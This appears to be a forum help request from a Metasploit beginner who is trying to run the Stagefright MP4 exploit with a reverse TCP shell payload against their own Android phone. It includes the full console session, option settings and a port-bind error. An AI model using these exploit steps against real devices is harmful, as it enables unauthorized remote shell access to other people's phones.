Metasploit: EXPLOIT FAIL to BIND

HI all,

I am new to Metasploit. Using Kali Rolling: Linux kali 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux.

I am trying to hack my own phone(Andriod Kitkat) using Andriod Exploit stagefrightmp4tx3g_64bit . In my router i have done port forwarding for port 4444 ,8080,443,80 for my Local IP to the laptop i am connected.

I execute below steps on machine to get a meterpreter session with my phone But failed
10.0.0.224 Is my Internal IP
174.60.173.11 is my external IP
msf > use exploit/android/browser/stagefrightmp4tx3g_64bit
msf exploit(stagefrightmp4tx3g64bit) > set payload linux/armle/shellreverse_tcp
payload => linux/armle/shellreversetcp
msf exploit(stagefrightmp4tx3g_64bit) > set lhost 10.0.0.224
lhost => 10.0.0.224
msf exploit(stagefrightmp4tx3g_64bit) > set lport 8080
lport => 8080
msf exploit(stagefrightmp4tx3g_64bit) > set SRVHOST 174.60.173.11
SRVHOST => 174.60.173.11
msf exploit(stagefrightmp4tx3g_64bit) > set SRVPORT 8080
SRVPORT => 8080
msf exploit(stagefrightmp4tx3g_64bit) > show options

Module options (exploit/android/browser/stagefrightmp4tx3g_64bit):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 174.60.173.11 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)

Payload options (linux/armle/shellreversetcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.0.224 yes The listen address
LPORT 8080 yes The listen port

Exploit target:

Id Name
-- ----
0 Automatic

msf exploit(stagefrightmp4tx3g_64bit) > exploit
* Exploit running as background job.
* Started reverse TCP handler on 10.0.0.224:8080

  • Exploit failed bad-config: Rex::BindFailed The address is already in use or unavailable: (174.60.173.11:8080).

msf exploit(stagefrightmp4tx3g64bit) > dbstatus
* postgresql connected to msf
msf exploit(stagefrightmp4tx3g_64bit) >

msf exploit(stagefrightmp4tx3g_64bit) > jobs

Jobs
====

No active jobs.

Apache2 is status is dead (Inactive) in back .

Please help me on this. What i am doing wrong.

When i tried to do exploit on INTERNAL IP ,the using EXTERNAL IP , exploit run successfully i got generated URL.

Be the First to Respond

Share Your Thoughts

  • Hot
  • Active